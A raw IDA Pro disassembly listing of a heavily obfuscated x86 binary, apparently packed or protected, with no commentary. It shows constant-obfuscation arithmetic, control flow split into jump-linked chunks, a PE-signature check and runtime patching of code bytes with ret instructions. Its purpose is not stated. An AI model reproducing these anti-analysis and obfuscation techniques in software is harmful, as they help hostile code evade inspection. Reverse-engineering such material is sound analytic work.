; ---------------------------------------------------------------------------
loc_44AC2C: ; CODE XREF: ut7h7i2x:0044FF61j
jmp sub_449EE1
; ---------------------------------------------------------------------------
loc_44AC31: ; CODE XREF: ut7h7i2x:0044BC4Cj
jmp loc_454EE6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A4C0
loc_44AC36: ; CODE XREF: sub_44A4C0-476Ej
call sub_451EDF
loc_44AC3B: ; CODE XREF: sub_44F943-D435j
jmp loc_440C66
; END OF FUNCTION CHUNK FOR sub_44A4C0
; =============== S U B R O U T I N E =======================================
sub_44AC40 proc near ; DATA XREF: sub_442C6B-60A4o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043B53A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043FA41 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FA94 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045293C SIZE 00000014 BYTES
push ebx
pushf
push 0CFFEC3A8h
pop ebx
jmp loc_43B53A
sub_44AC40 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_44AC4D: ; CODE XREF: ut7h7i2x:00444E3Bj
jp loc_447435
push 1010E5AFh
and edx, 9460844h
; START OF FUNCTION CHUNK FOR sub_43A556
loc_44AC5E: ; CODE XREF: sub_43A556+3126j
and esi, 7042A5FCh
rol esi, 1Dh
add esi, 39BC50h
mov [esi], eax
pop esi
jmp loc_44B63F
; END OF FUNCTION CHUNK FOR sub_43A556
; =============== S U B R O U T I N E =======================================
sub_44AC75 proc near ; CODE XREF: sub_449D3B:loc_450963p
; sub_44EE57+3975j
xchg ecx, [esp+0]
pop ecx
call sub_43F3D1
lea eax, [ebp-0Ch]
push edi
mov edi, edx
xchg edi, [esp+0]
push eax
jmp loc_452D69
sub_44AC75 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jmp ds:dword_41D120
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_418. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jb loc_458666
mov eax, [esp]
push edx
call sub_44B5CF
jmp loc_45653F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_447. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452D3D
loc_44ACA9: ; CODE XREF: sub_452D3D-1305Aj
jmp loc_43E8BF
; END OF FUNCTION CHUNK FOR sub_452D3D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A8EC
loc_44ACAE: ; CODE XREF: sub_45A8EC-197C5j
; ut7h7i2x:00443DB7j
add eax, 4105E211h
mov eax, [eax]
or eax, eax
jnz loc_43B0CF
; END OF FUNCTION CHUNK FOR sub_45A8EC
; START OF FUNCTION CHUNK FOR sub_452B14
loc_44ACBE: ; CODE XREF: sub_452B14-16FAFj
jmp loc_455213
; END OF FUNCTION CHUNK FOR sub_452B14
; ---------------------------------------------------------------------------
loc_44ACC3: ; CODE XREF: ut7h7i2x:00444B8Bj
mov [edi], esi
; =============== S U B R O U T I N E =======================================
sub_44ACC5 proc near ; CODE XREF: ut7h7i2x:00441521p
xchg ecx, [esp+0]
pop ecx
cmp dword ptr [eax], 47424454h
jz loc_456EB1
jmp loc_456868
sub_44ACC5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_44ACDA: ; CODE XREF: sub_4503C3-15F76j
add ebx, ecx
jmp loc_43AC2E
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_44ACE1: ; CODE XREF: sub_4524FE:loc_43DE51j
js loc_450EEA
jge loc_45890A
; END OF FUNCTION CHUNK FOR sub_4524FE
; START OF FUNCTION CHUNK FOR sub_4586A8
loc_44ACED: ; CODE XREF: sub_4586A8-D806j
and eax, 654973Fh
add eax, 0FBEFB11Dh
xchg eax, [esp+0]
; END OF FUNCTION CHUNK FOR sub_4586A8
; START OF FUNCTION CHUNK FOR sub_449700
loc_44ACFC: ; CODE XREF: sub_449700:loc_440D34j
jmp loc_4397BF
; END OF FUNCTION CHUNK FOR sub_449700
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455775
loc_44AD01: ; CODE XREF: sub_455775+14j
jz loc_446E31
jmp loc_442564
; END OF FUNCTION CHUNK FOR sub_455775
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_208. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4433C5
loc_44AD0D: ; CODE XREF: sub_4433C5+Fj
jmp loc_43EA57
; END OF FUNCTION CHUNK FOR sub_4433C5
; ---------------------------------------------------------------------------
mov edx, edi
jmp sub_441C8F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_39. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_44AD1A: ; CODE XREF: sub_43AA94:loc_43EDFBj
jz loc_45AB72
jmp loc_44C33F
; END OF FUNCTION CHUNK FOR sub_43AA94
; =============== S U B R O U T I N E =======================================
sub_44AD25 proc near ; CODE XREF: sub_454B2B-1A2D6p
; ut7h7i2x:0045A821j
xchg ebx, [esp+0]
pop ebx
mov [ebp-18h], eax
push 0E72A25E7h
pop eax
or eax, 57BE752Dh
add eax, 2A43C371h
call sub_451900
sub_44AD25 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4482D0
loc_44AD43: ; CODE XREF: sub_4482D0+2401j
jmp loc_458E03
; END OF FUNCTION CHUNK FOR sub_4482D0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4423C1
loc_44AD48: ; CODE XREF: sub_4423C1+Dj
jmp loc_44780D
; END OF FUNCTION CHUNK FOR sub_4423C1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441765
loc_44AD4D: ; CODE XREF: sub_441765-5DF6j
jmp loc_441113
; END OF FUNCTION CHUNK FOR sub_441765
; ---------------------------------------------------------------------------
loc_44AD52: ; CODE XREF: ut7h7i2x:0043905Dj
jmp loc_442D4D
; ---------------------------------------------------------------------------
loc_44AD57: ; CODE XREF: ut7h7i2x:0043DC1Bj
xor edi, ecx
adc ebx, ecx
loc_44AD5B: ; CODE XREF: ut7h7i2x:0043DC09j
and esi, 0C6924EA0h
add esi, 0BFB209F2h
xchg esi, [esp]
jmp sub_43CA2D
; =============== S U B R O U T I N E =======================================
sub_44AD6F proc near ; CODE XREF: ut7h7i2x:0043CCB7j
; ut7h7i2x:0044CE76p
; FUNCTION CHUNK AT 00454371 SIZE 0000002B BYTES
xchg edx, [esp+0]
pop edx
push edx
push eax
jmp loc_454371
sub_44AD6F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453188
loc_44AD7A: ; CODE XREF: sub_453188+13j
and esi, ds:4000F6h
xor esi, 0EE025E2Bh
popf
xor eax, esi
pop esi
sub eax, 0E5CE4A21h
jmp loc_4517B1
; END OF FUNCTION CHUNK FOR sub_453188
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A12
loc_44AD95: ; CODE XREF: sub_444A12j
mov eax, ds:dword_43C910
jmp loc_44C10A
; END OF FUNCTION CHUNK FOR sub_444A12
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444029
loc_44ADA0: ; CODE XREF: sub_444029+127EFj
push 62DDACE7h
pop eax
add eax, 806EA163h
sub eax, ds:4000F9h
or eax, 1BD9FD27h
add eax, 9A210D43h
add eax, ebp
jmp loc_444967
; END OF FUNCTION CHUNK FOR sub_444029
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445AD1
loc_44ADC5: ; CODE XREF: sub_445AD1:loc_43E65Ej
xchg ecx, [esp+0]
mov eax, edx
call sub_44C273
mov eax, [esp+0]
push edx
mov edx, eax
jmp loc_439672
; END OF FUNCTION CHUNK FOR sub_445AD1
; ---------------------------------------------------------------------------
loc_44ADDA: ; CODE XREF: ut7h7i2x:00450880j
jnp loc_4402E0
mov ebx, 0A97F6461h
; =============== S U B R O U T I N E =======================================
sub_44ADE5 proc near ; CODE XREF: sub_44AA54+9FC7p
xchg ecx, [esp+0]
pop ecx
add eax, 2CC31FF0h
push offset loc_4539AE
jmp nullsub_76
sub_44ADE5 endp
; =============== S U B R O U T I N E =======================================
sub_44ADF9 proc near ; CODE XREF: ut7h7i2x:00443ECDj
; sub_457FDD+1Fp
arg_0 = dword ptr 4
xchg eax, [esp+0]
pop eax
xchg ebx, [esp-4+arg_0]
jmp sub_43AED9
sub_44ADF9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440944
loc_44AE05: ; CODE XREF: sub_440944:loc_456C6Bj
xor eax, 913B6DAh
sub eax, 60D44596h
and eax, 0EA80096Dh
add eax, 0DA73385Bh
add eax, ebp
; END OF FUNCTION CHUNK FOR sub_440944
; START OF FUNCTION CHUNK FOR sub_442E76
loc_44AE1F: ; CODE XREF: sub_442E76:loc_441872j
jmp loc_43DEB3
; END OF FUNCTION CHUNK FOR sub_442E76
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4455F4
loc_44AE24: ; CODE XREF: sub_4455F4:loc_4455FAj
mov ebp, esp
push ecx
mov byte ptr [ebp-1], 0
mov eax, cs
xor al, al
jmp loc_44322D
; END OF FUNCTION CHUNK FOR sub_4455F4
; ---------------------------------------------------------------------------
js nullsub_259
jmp sub_43CAF4
; ---------------------------------------------------------------------------
loc_44AE3F: ; DATA XREF: sub_443CE1o
xchg eax, [esp]
mov edx, eax
pop eax
; START OF FUNCTION CHUNK FOR sub_44E8A5
loc_44AE45: ; CODE XREF: sub_44E8A5:loc_43F870j
call sub_454466
; END OF FUNCTION CHUNK FOR sub_44E8A5
; START OF FUNCTION CHUNK FOR sub_44917B
loc_44AE4A: ; CODE XREF: sub_44917B+144Ej
add eax, ebp
add eax, 0E826C9B2h
mov eax, [eax]
mov esp, ebp
xchg ecx, [esp+0]
mov ebp, ecx
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_44917B
; ---------------------------------------------------------------------------
call sub_43BA59
or eax, eax
jnz loc_440901
jmp loc_457326
; ---------------------------------------------------------------------------
loc_44AE6F: ; CODE XREF: ut7h7i2x:0044D24Aj
pushf
; =============== S U B R O U T I N E =======================================
sub_44AE70 proc near ; CODE XREF: sub_44DF13-3B77p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00439CBC SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
mov eax, [esp-4+arg_0]
call sub_454196
jmp loc_439CBC
sub_44AE70 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E688
loc_44AE81: ; CODE XREF: sub_44E688+2A50j
pop ecx
or ecx, 0ECC0D54Bh
add ecx, 4BB4C86Ch
rol ecx, 14h
sub ecx, 0C64E3A7Dh
jmp loc_447F60
; END OF FUNCTION CHUNK FOR sub_44E688
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4586A8
loc_44AE9C: ; CODE XREF: sub_4586A8+10j
xor eax, 0EA29BD46h
jns loc_44ACED
loc_44AEA8: ; CODE XREF: sub_4424D2+2BB1j
jmp loc_44E6F1
; END OF FUNCTION CHUNK FOR sub_4586A8
; ---------------------------------------------------------------------------
cmp esi, 0B7795A74h
jmp loc_44D2A4
; ---------------------------------------------------------------------------
test ecx, 1E21CE95h
jmp loc_4392A8
; ---------------------------------------------------------------------------
loc_44AEC3: ; CODE XREF: ut7h7i2x:loc_4497B7j
or edx, 34154DA2h
sub edx, 20B0CE8Ch
or edx, 0BB65293Fh
; START OF FUNCTION CHUNK FOR sub_458345
loc_44AED5: ; CODE XREF: ut7h7i2x:0043CEA6j
; sub_458345:loc_44A108j
rol edx, 17h
jmp loc_457D22
; END OF FUNCTION CHUNK FOR sub_458345
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455597
loc_44AEDD: ; CODE XREF: sub_455597:loc_43D303j
; sub_455597-18284j
add edx, 945D1F7h
mov [edx], eax
pop edx
lea eax, nullsub_62
mov byte ptr [eax], 0C3h
jmp loc_4428BC
; END OF FUNCTION CHUNK FOR sub_455597
; ---------------------------------------------------------------------------
loc_44AEF4: ; CODE XREF: ut7h7i2x:00451009j
mov eax, [esp]
push edx
call sub_4439B0
jmp loc_456568
; ---------------------------------------------------------------------------
mov ebx, [edi]
jmp sub_455461
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_44AF09: ; CODE XREF: sub_43D021:loc_43F280j
jz loc_457E18
jmp loc_45397A
; END OF FUNCTION CHUNK FOR sub_43D021
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FBB6
loc_44AF14: ; CODE XREF: sub_43FBB6+11j
cmp dword ptr [eax], 4550h
jnz loc_456678
jmp loc_446904
; END OF FUNCTION CHUNK FOR sub_43FBB6
; ---------------------------------------------------------------------------
locret_44AF25: ; CODE XREF: ut7h7i2x:0044327Fj
retn
; ---------------------------------------------------------------------------
push eax
ror eax, 0Bh
mov ds:dword_443740, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D989
loc_44AF31: ; CODE XREF: sub_43D989+5EFEj
jmp loc_45A72A
; END OF FUNCTION CHUNK FOR sub_43D989
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FA50
loc_44AF36: ; CODE XREF: sub_43FA50+Fj
jmp loc_454023
; END OF FUNCTION CHUNK FOR sub_43FA50
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439AE7
loc_44AF3B: ; CODE XREF: sub_439AE7:loc_439369j
call sub_43BB85
loc_44AF40: ; CODE XREF: sub_442B3B+14BCCj
jmp loc_4588B2
; END OF FUNCTION CHUNK FOR sub_439AE7
; ---------------------------------------------------------------------------
loc_44AF45: ; CODE XREF: ut7h7i2x:0044A866j
jmp loc_44AB6F
; ---------------------------------------------------------------------------
loc_44AF4A: ; CODE XREF: ut7h7i2x:0043B5ABj
add esi, ebp
; =============== S U B R O U T I N E =======================================
sub_44AF4C proc near ; CODE XREF: sub_4586CB+6p
xchg edi, [esp+0]
pop edi
add eax, 5CEDE7E3h
mov eax, [eax]
add eax, eax
sub_44AF4C endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_43CD08
loc_44AF5A: ; CODE XREF: sub_43CD08:loc_445550j
cdq
add eax, [esp+0]
jmp loc_43D7E8
; END OF FUNCTION CHUNK FOR sub_43CD08
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A599
loc_44AF63: ; CODE XREF: sub_45A599:loc_44E39Aj
xchg ecx, [esp+0]
mov edx, ecx
loc_44AF68: ; CODE XREF: ut7h7i2x:004570CBj
; sub_446C7B:loc_457308j
pop ecx
mov eax, [esp+0]
push edi
mov edi, edx
xchg edi, [esp+0]
call sub_45173A
jmp loc_43F6B2
; END OF FUNCTION CHUNK FOR sub_45A599
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45292B
loc_44AF7C: ; CODE XREF: sub_45292B:loc_45AD3Aj
push 72CBCAEAh
pop eax
; END OF FUNCTION CHUNK FOR sub_45292B
; START OF FUNCTION CHUNK FOR sub_43BA9E
loc_44AF82: ; CODE XREF: sub_43BA9E:loc_44037Dj
or eax, 0BF6155B5h
add eax, 5A02C8Bh
and eax, 0BF7CF1CBh
add eax, 0FB388766h
mov eax, [eax]
jmp loc_4417C5
; END OF FUNCTION CHUNK FOR sub_43BA9E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446599
loc_44AFA1: ; CODE XREF: sub_446599:loc_452357j
pop edi
xor edi, 0D0A4B45h
sub edi, 0CAC2AC68h
jns loc_4464A6
rol eax, 1
jmp loc_44649F
; END OF FUNCTION CHUNK FOR sub_446599
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_44AFBB: ; CODE XREF: sub_43CCC3:loc_43A8BCj
jnz loc_444C00
adc esi, eax
jmp loc_43CE93
; END OF FUNCTION CHUNK FOR sub_43CCC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446CA0
loc_44AFC8: ; CODE XREF: sub_446CA0+BA89j
push 607274F1h
pop ebx
sub ebx, 0B8E93787h
add ebx, 67E169B5h
add ebx, ebp
add ebx, 0F09558D5h
mov ebx, [ebx]
jmp loc_447E10
; END OF FUNCTION CHUNK FOR sub_446CA0
; ---------------------------------------------------------------------------
call sub_447EDC
; START OF FUNCTION CHUNK FOR sub_44E2AA
loc_44AFEE: ; CODE XREF: sub_44E2AA-644Fj
jmp nullsub_111
; END OF FUNCTION CHUNK FOR sub_44E2AA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A4C0
loc_44AFF3: ; CODE XREF: sub_44A4C0-983Fj
jmp nullsub_88
; END OF FUNCTION CHUNK FOR sub_44A4C0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A218
loc_44AFF8: ; CODE XREF: sub_43A218+1E65j
jmp loc_44341B
; END OF FUNCTION CHUNK FOR sub_43A218
; =============== S U B R O U T I N E =======================================
sub_44AFFD proc near ; DATA XREF: ut7h7i2x:004390FEo
; FUNCTION CHUNK AT 00444DF0 SIZE 00000005 BYTES
mov byte ptr [eax], 0C3h
jmp loc_444DF0
sub_44AFFD endp
; =============== S U B R O U T I N E =======================================
sub_44B005 proc near ; CODE XREF: sub_41088C+45p
; sub_44B005+5j
; DATA XREF: ...
call sub_44B01F
jmp ds:off_41D0A8
sub_44B005 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B847
loc_44B010: ; CODE XREF: sub_43B847+1DFEDj
jmp loc_453695
; END OF FUNCTION CHUNK FOR sub_43B847
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44AA54
loc_44B015: ; CODE XREF: sub_44AA54+6j
jmp loc_439873
; END OF FUNCTION CHUNK FOR sub_44AA54
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_44B01A: ; CODE XREF: sub_439BD1+2164j
jmp loc_452DFE
; END OF FUNCTION CHUNK FOR sub_439BD1
; =============== S U B R O U T I N E =======================================
sub_44B01F proc near ; CODE XREF: sub_44B01F:loc_43ABB5j
; sub_44B005p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004393AD SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0043989F SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043ABB5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043AE08 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E6E6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440445 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00444B90 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00447CAA SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044EC9D SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00457966 SIZE 0000000E BYTES
pop edx
jmp loc_43989F
sub_44B01F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443BC5
loc_44B025: ; CODE XREF: sub_443BC5+Fj
and eax, 6ABB9F69h
add eax, 0F530B497h
add eax, ebp
add eax, 0C013AE44h
mov eax, [eax]
mov al, [eax]
jb loc_44DB65
sub al, 99h
jmp loc_4563D7
; END OF FUNCTION CHUNK FOR sub_443BC5
; ---------------------------------------------------------------------------
jmp ds:dword_41D170
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_514. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
cmp byte ptr [esp+eax*2-74A60000h], 4
and al, 56h
jmp loc_458175
; ---------------------------------------------------------------------------
loc_44B060: ; CODE XREF: ut7h7i2x:loc_43D431j
; ut7h7i2x:loc_44F435j
push 2F23C145h
pop edx
rol edx, 1Dh
add edx, 5A612A5Ch
xchg edx, [esp]
jmp loc_43F3DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455060
loc_44B077: ; CODE XREF: sub_455060-16351j
adc eax, 0DDAA941Bh
loc_44B07D: ; CODE XREF: sub_455060:loc_450283j
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jnz loc_44B51E
jmp loc_43B59E
; END OF FUNCTION CHUNK FOR sub_455060
; ---------------------------------------------------------------------------
loc_44B08E: ; CODE XREF: ut7h7i2x:loc_442CEDj
add eax, 8B5AADB6h
add eax, ebp
push offset loc_448E0F
jmp loc_442FDD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43ABBA
loc_44B0A0: ; CODE XREF: sub_43ABBA+1BA74j
push 0B9A5FB3Ah
pop edi
xor edi, 0A873C401h
add edi, 0BD962A64h
xor edi, 4E31C5Fh
add edx, edi
pop edi
jmp loc_455BA2
; END OF FUNCTION CHUNK FOR sub_43ABBA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4431FF
loc_44B0C0: ; CODE XREF: sub_4431FF:loc_4390A0j
pop ecx
xor ecx, 0C46EDBFCh
and ecx, 0F200CF2Dh
xor ecx, 90E96449h
sub eax, ecx
call sub_451A5A
loc_44B0DA: ; CODE XREF: sub_4555CE-1DC4j
jmp loc_445A6E
; END OF FUNCTION CHUNK FOR sub_4431FF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C2F9
loc_44B0DF: ; CODE XREF: sub_43C2F9+6j
jmp loc_4570B7
; END OF FUNCTION CHUNK FOR sub_43C2F9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_44B0E4: ; CODE XREF: sub_4570FD-1565Bj
; ut7h7i2x:00446540j ...
mov eax, 6F7h
call sub_448005
push offset sub_44E688
jmp nullsub_505
; END OF FUNCTION CHUNK FOR sub_4524FE
; ---------------------------------------------------------------------------
xor eax, edi
jmp sub_456397
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4399B5
loc_44B0FF: ; CODE XREF: sub_4399B5:loc_440775j
mov eax, 12h
push offset sub_455EC1
jmp loc_451089
; END OF FUNCTION CHUNK FOR sub_4399B5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_203. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_44B10F: ; CODE XREF: sub_44B1E7:loc_43D653j
; sub_43CCC3+BA5j
jmp loc_440A49
; END OF FUNCTION CHUNK FOR sub_43CCC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C791
loc_44B114: ; CODE XREF: sub_44C791:loc_457D6Cj
shr esi, 2
jmp loc_447125
; END OF FUNCTION CHUNK FOR sub_44C791
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CAA4
loc_44B11D: ; CODE XREF: sub_44CAA4+10j
jmp loc_449907
; END OF FUNCTION CHUNK FOR sub_44CAA4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44B122 proc near ; DATA XREF: ut7h7i2x:004501D2o
; ut7h7i2x:00455E66o
var_2CC = dword ptr -2CCh
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0043D6E7 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0043D9E1 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00440596 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440D78 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00441614 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044A9AC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B94A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CF1B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452090 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00457C64 SIZE 00000005 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFD38h
push 0C416D8EDh
pop eax
sub eax, 30AE9E41h
jmp loc_44A9AC
sub_44B122 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_111. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_87. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_44B13E: ; CODE XREF: ut7h7i2x:00444B79j
jmp loc_44D506
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D406
loc_44B143: ; CODE XREF: sub_44D406+4j
mov eax, [ebp-0Ch]
; END OF FUNCTION CHUNK FOR sub_44D406
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_44B146: ; CODE XREF: sub_43CCC3:loc_44EBEDj
mov [ebp-1Ch], eax
jmp loc_43CA6C
; END OF FUNCTION CHUNK FOR sub_43CCC3
; ---------------------------------------------------------------------------
xchg edi, esi
jmp sub_44941C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_44B155: ; CODE XREF: sub_4462B0+257Dj
mov esi, 0C71AB3ACh
jp loc_43C023
test eax, esi
jmp loc_45180D
; END OF FUNCTION CHUNK FOR sub_4462B0
; ---------------------------------------------------------------------------
loc_44B167: ; DATA XREF: sub_44D8E8:loc_44D8E9o
mov ebp, esp
push ecx
mov [ebp-4], eax
mov eax, [ebp-4]
mov al, [eax]
jno loc_44BCE6
loc_44B178: ; CODE XREF: ut7h7i2x:loc_44E87Dj
sub al, 99h
jmp loc_44BF2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D1F0
loc_44B17F: ; CODE XREF: sub_44D1F0+11j
jz loc_43D7D4
loc_44B185: ; CODE XREF: sub_452B14:loc_44BFF5j
jmp loc_44F052
; END OF FUNCTION CHUNK FOR sub_44D1F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_44B18A: ; CODE XREF: sub_43CCC3+1DC8Dj
jz loc_440D0B
jmp loc_44FB17
; END OF FUNCTION CHUNK FOR sub_43CCC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_451F39
loc_44B195: ; CODE XREF: sub_451F39:loc_4458B7j
add eax, 2E1CAB4Fh
mov [ebp-8], eax
mov eax, offset dword_451524
mov [ebp-0Ch], eax
xor eax, eax
jmp loc_440204
; END OF FUNCTION CHUNK FOR sub_451F39
; ---------------------------------------------------------------------------
and ebx, 0A0F72DC7h
xor eax, esi
jmp sub_44C2ED
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456F1D
loc_44B1BA: ; CODE XREF: sub_456F1D:loc_44A50Cj
jz loc_44A5B7
jmp loc_43AEB9
; END OF FUNCTION CHUNK FOR sub_456F1D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45341C
loc_44B1C5: ; CODE XREF: sub_45341C:loc_4499B9j
mov ebp, esp
push ebx
mov ebx, ecx
xchg ebx, [esp+0]
push edi
jmp loc_44E776
; END OF FUNCTION CHUNK FOR sub_45341C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443A45
loc_44B1D3: ; CODE XREF: sub_452814-109A2j
; sub_443A45:loc_441E84j
rol eax, 1Eh
and eax, 98C79DF7h
cmp eax, 0B60B879Eh
jmp loc_44EDDB
; END OF FUNCTION CHUNK FOR sub_443A45
; =============== S U B R O U T I N E =======================================
sub_44B1E7 proc near ; DATA XREF: sub_457BC2:loc_43D263o
; FUNCTION CHUNK AT 004394B2 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043D653 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00444ED5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004479D6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448BF3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A70D SIZE 0000000F BYTES
mov eax, [ebp-10h]
push eax
call sub_44DB3E
test eax, eax
jmp loc_448BF3
sub_44B1E7 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447167
loc_44B1F7: ; CODE XREF: sub_447167-C7BAj
push eax
push 0D60DC613h
pop eax
rol eax, 1
or eax, 21FF8B00h
and eax, 2F25FFEEh
jmp loc_44B393
; END OF FUNCTION CHUNK FOR sub_447167
; =============== S U B R O U T I N E =======================================
sub_44B211 proc near ; CODE XREF: ut7h7i2x:00442741p
; ut7h7i2x:00456406j
xchg ecx, [esp+0]
pop ecx
push edx
push eax
mov eax, [ebp-18h]
add eax, eax
jmp loc_43DD62
sub_44B211 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459653
loc_44B221: ; CODE XREF: sub_459653:loc_44E197j
adc edx, [esp+arg_0]
add esp, 8
jmp loc_439226
; END OF FUNCTION CHUNK FOR sub_459653
; ---------------------------------------------------------------------------
loc_44B22D: ; CODE XREF: ut7h7i2x:0043F54Cj
call sub_43DA21
push 0CC1CE534h
pop eax
xor eax, 2AB8DF25h
jmp loc_446363
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_451EF2
loc_44B243: ; CODE XREF: sub_451EF2:loc_45AE26j
mov esp, ebp
pop ebp
call sub_44E2AA
; END OF FUNCTION CHUNK FOR sub_451EF2
